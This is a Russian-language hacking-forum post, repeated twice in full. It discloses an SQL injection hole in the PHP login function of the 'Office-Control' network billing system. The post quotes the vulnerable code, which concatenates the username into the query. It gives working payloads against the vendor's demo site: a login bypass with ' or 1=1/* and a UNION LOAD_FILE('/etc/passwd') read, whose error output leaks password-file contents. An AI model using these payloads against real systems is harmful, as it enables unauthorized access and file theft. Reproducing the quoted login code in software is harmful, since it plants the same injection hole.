Goudini
23.11.2007, 02:38
Система "Office-Control" предназначена для управления, биллинга и защиты сетей офисов
первое что сразу же попалось на глаза:
http://office-control.org/svn/repos/client_web/www/classes/base/session.php
public function Login($strUsername, $strPlainPassword, $admin=0) {
$strMD5Password = md5($strPlainPassword);
if ($admin==0)
$stmt = "select id FROM clients WHERE login = '$strUsername' AND password = '$strMD5Password'";
else
$stmt = "select id FROM admins WHERE login = '$strUsername' AND password = '$strMD5Password'";
client.office-control.org - Демо-версия WEB-клиента. имя - new, пароль - 123.
Вход без пароля:
Login: ' or 1=1/*
Password: never mind
Login: 123'/*
Password: never mind
Есть права для работы с файлами:
Login: a' union select LOAD_FILE('/etc/passwd')/*
Password: never mind
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon' at line 1
первое что сразу же попалось на глаза:
http://office-control.org/svn/repos/client_web/www/classes/base/session.php
public function Login($strUsername, $strPlainPassword, $admin=0) {
$strMD5Password = md5($strPlainPassword);
if ($admin==0)
$stmt = "select id FROM clients WHERE login = '$strUsername' AND password = '$strMD5Password'";
else
$stmt = "select id FROM admins WHERE login = '$strUsername' AND password = '$strMD5Password'";
client.office-control.org - Демо-версия WEB-клиента. имя - new, пароль - 123.
Вход без пароля:
Login: ' or 1=1/*
Password: never mind
Login: 123'/*
Password: never mind
Есть права для работы с файлами:
Login: a' union select LOAD_FILE('/etc/passwd')/*
Password: never mind
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon' at line 1